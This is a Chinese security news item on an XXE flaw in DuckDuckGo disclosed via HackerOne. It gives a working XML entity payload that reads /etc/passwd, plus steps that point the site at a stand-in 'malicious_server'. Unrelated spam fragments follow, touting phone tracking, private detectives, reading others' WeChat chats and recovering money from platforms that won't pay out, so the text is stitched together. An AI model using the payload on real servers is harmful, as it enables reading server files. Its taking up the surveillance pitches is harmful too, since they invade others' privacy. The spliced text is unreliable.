近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。
DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。
漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。
只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。
而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。
具体步骤如下
1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。
<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>
2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml
3.返回的页面可以看到xm l文件解析结果
首先简单跟大家说一下,这个问题是比较涉及法律的问题,所以如果你要进行手机定位的话那损失了人家的隐私权,做了就要承担一切的后果,如果做的话,大家也可以找相应的私家侦探进行调查,但是大家可以用一些巧妙...
现在很多网上的网站都会打着某正规的网站的旗号在招摇撞骗,那遇到平台不给出款我们该如何挽回自己的损失呢? 一、识别方法,我们可以通过基础的理念来识破羊入虎口的理念,首先真实平台投资相对来说是非常之...
调查一个人需要多少钱?调查一个人需要多少信息?大多数夫妻在吵架时都会注意自己,完全不顾对方的感情,其实这是错误的,今天花城编辑和你讨论夫妻如何经常吵架如何挽救爱情,看看两个人是如何为挽救爱情而斗争的;...
人们都会说白领是知识分子,因此这个阶层的人在生活中会很注意。无论是工作,还是一些其它的事情,总会做的很出色。但是即使是他们,在当今互联网快速发展的这样一个年代,...
旁人看来或许只是一个小小的举动、一个不起眼的想法,可能在不经意间就会改变一个人甚至一群人的命运轨迹。 怎么才能查微信聊天记录啊 怎么在自己电脑保存登录过的微信聊天记录网络时代,硬核与温情并存 11...
笔者就这一问题做过广泛的调查,中国人与西方人的回答是截然相反的。事实上,大量生活现象和常识告诉我们,西方人在诸多道德观念与教育理念上与中国人毫无共同之处,在家庭伦理和道德观念上同样几无共同之处。在西方...